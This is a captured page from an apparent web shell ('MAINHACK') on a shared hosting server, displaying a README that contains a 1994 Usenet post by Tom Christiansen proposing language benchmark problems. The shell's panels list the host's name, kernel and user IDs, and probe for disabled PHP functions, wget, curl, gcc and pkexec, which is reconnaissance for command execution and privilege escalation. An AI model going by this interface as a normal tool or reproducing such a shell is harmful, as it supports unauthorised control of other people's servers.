[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: README
File is not writable. Editing disabled.
Subject: Re: What language would you use? From: Tom Christiansen <tchrist@mox.perl.com> Date: 6 Nov 1994 15:14:51 GMT Newsgroups: comp.lang.python,comp.lang.tcl,comp.lang.scheme,comp.lang.misc,comp.lang.perl Message-Id: <39irtb$3t4@csnews.cs.Colorado.EDU> References: <39b7ha$j9v@zeno.nscf.org> <39hhjp$lgn@csnews.cs.Colorado.EDU> <39hvsu$dus@mathserv.mps.ohio-state.edu> [...] If you're really into benchmarks, I'd love it if someone were to code up the following problems in tcl, python, and scheme (and whatever else you'd like). Separate versions (one optimized for speed, one for beauty :-) are ok. Post your code so we can time it on our own systems. 0) Factorial Test (numerics and function calls) (we did this already) 1) Regular Expressions Test Read a file of (extended per egrep) regular expressions (one per line), and apply those to all files whose names are listed on the command line. Basically, an 'egrep -f' simulator. Test it with 20 "vt100" patterns against a five /etc/termcap files. Tests using more elaborate patters would also be interesting. Your code should not break if given hundreds of regular expressions or binary files to scan. 2) Sorting Test Sort an input file that consists of lines like this var1=23 other=14 ditto=23 fred=2 such that each output line is sorted WRT to the number. Order of output lines does not change. Resolve collisions using the variable name. e.g. fred=2 other=14 ditto=23 var1=23 Lines may be up to several kilobytes in length and contain zillions of variables. 3) System Test Given a list of directories, report any bogus symbolic links contained anywhere in those subtrees. A bogus symbolic link is one that cannot be resolved because it points to a nonexistent or otherwise unresolvable file. Do *not* use an external find executable. Directories may be very very deep. Print a warning immediately if the system you're running on doesn't support symbolic links. I'll post perl solutions if people post the others. --tom -- Tom Christiansen Perl Consultant, Gamer, Hiker tchrist@mox.perl.com "But Billy! A *small* allowance prepares you for a lifetime of small salaries and for your Social Security payments." --Family Circus
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 699.65 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A